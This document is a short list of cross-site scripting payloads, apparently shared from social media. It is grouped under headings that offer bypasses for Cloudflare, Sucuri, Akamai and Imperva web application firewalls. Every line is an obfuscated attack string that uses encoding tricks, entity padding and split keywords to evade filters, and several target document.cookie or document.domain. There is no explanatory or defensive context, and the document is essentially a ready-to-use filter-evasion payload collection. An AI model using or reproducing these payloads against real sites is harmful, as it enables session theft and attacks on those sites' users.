##Thanks for people those who shares XSS payload on likedin.
<svg/onload=parent[/al/.source+/ert/.source](1)>
<svg/onload=parent[/al/.source.concat(/ert/.scource)](2)>
<img/src=x onError​="`${x}`;alert(`XSS`);">
<marquee+loop=1+width=0+onfinish='new+Function`al\ert`1``'>
<img+border%3d3+alt%3djaVasCript%3a%2f*-
%3ca%2fhref%3d%22j%0A%0Davascript%3a%7bvar%7b3%3as,2%3ah,5%3aa,0%3av,4%3an,1%3ae%7d%3d'earltv'%7d[self][0][v%2ba%2be%2bs](e%2bs%2bv%2bh%2bn)(document.domain)%22%20%2f%3eclick
<img+border%3d3+alt%3djaVasCript%3a%2f*-%2f*%60%2f*%5c%60%2f*%26%23039%3b%2f*%26quot%3b%2f**%2f(%2f*+*%2foNcliCk%3dalert()+)%2f%2f%250D%250A%250d%250a%2f%2f%26lt%3b%2fstYle%2f%26lt%3b%
2ftitLe%2f%26lt%3b%2fteXtarEa%2f%26lt%3b%2fscRipt%2f--!%26gt%3b%5cx3csVg%2f%26lt%3bsVg%2foNloAd%3dconfirm(%27XSS%27)%2f%2f%26gt%3b%5cx3e>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(document.domain)" />click

##Cloudflare bypass:
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload​=prompt(document.cookie)%20>
<svg onload​=prompt&#0000000040document.domain)> Hex: <svg onload​=prompt&#x000000028;document.domain)>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt​&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> 

##Sucuri bypass:
"><input/onauxclick​="[1].map(prompt)">

##Akamai Firewall: 
'"><A HRef=\" AutoFocus OnFocus​=top/**/?.document%2Bcookie>

##Imperva WAF:
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter​=alert(location)%3E%3!–
